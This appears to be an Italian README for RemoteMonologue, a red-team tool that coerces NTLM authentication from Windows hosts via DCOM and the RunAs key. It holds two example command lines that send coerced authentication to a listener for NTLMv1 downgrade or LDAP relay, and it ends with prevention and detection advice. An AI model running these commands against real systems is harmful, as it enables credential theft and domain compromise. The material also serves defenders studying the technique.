
Armare DCOM per coercizioni di autenticazione NTLM
RemoteMonologue è una tecnica di raccolta di credenziali Windows che consente il compromesso remoto degli utenti sfruttando la chiave RunAs dell'utente interattivo e forzando autenticazioni NTLM tramite DCOM.
Leggi RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions di X-Force Red per informazioni dettagliate.
🔹 Coercizione dell'autenticazione tramite DCOM (-dcom)
ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) per attivare un'autenticazione NTLM verso un listener specificato (-auth-to).🔹 Credential Spraying (-spray)
🔹 Attacco di downgrade NetNTLMv1 (-downgrade)
🔹 Abuso del servizio WebClient (-webclient)
🔹 Enumerazione degli utenti (-query)
Nota: Sono richiesti privilegi di amministratore locale sul sistema target.
pip install impacket
Di seguito è riportato un esempio di esecuzione di RemoteMonologue con l'attacco di downgrade NetNTLMv1 utilizzando Responder come listener. Per impostazione predefinita, se non viene specificata alcuna opzione DCOM, lo strumento utilizza l'oggetto DCOM ServerDataCollectorSet.
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

Di seguito è riportato un altro esempio: questa volta l'attacco viene eseguito utilizzando l'oggetto DCOM FileSystemImage e abilitando il servizio WebClient per ottenere un'autenticazione HTTP, che viene poi inoltrata a LDAP tramite ntlmrelayx.
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

Per proteggersi da queste tecniche e rilevarle, è possibile implementare diverse misure preventive e di rilevamento.
Misure preventive:
Abilitare la firma LDAP e il channel binding: Configurare l'applicazione della firma LDAP e il channel binding sui controller di dominio per proteggere l'endpoint LDAP dagli attacchi di relay. Nota: Queste impostazioni saranno applicate per impostazione predefinita a partire da Windows Server 2025.
Aggiornare alle versioni più recenti di Windows: Aggiornare i server a Windows Server 2025 e le workstation a Windows 11 versione 24H2 per mitigare gli attacchi di downgrade NetNTLM, poiché NTLMv1 è stato rimosso in queste versioni.
Applicare la firma SMB: Abilitare e imporre la firma SMB sui server Windows per prevenire gli attacchi di relay SMB.
Implementare policy password complesse: Applicare requisiti di password robuste per rendere più difficili gli attacchi di cracking delle password.
Opportunità di rilevamento:
Monitorare l'accesso remoto agli oggetti DCOM: Tracciare l'accesso agli oggetti DCOM interessati e alle loro specifiche proprietà e metodi per identificare attività anomale.
Monitorare le modifiche al registro: Monitorare le modifiche alle chiavi di registro RunAs e LmCompatibilityLevel.
Tracciare l'attività del servizio WebClient: Monitorare i casi in cui il servizio WebClient viene abilitato da remoto, poiché viene utilizzato per facilitare le autenticazioni NTLM basate su HTTP.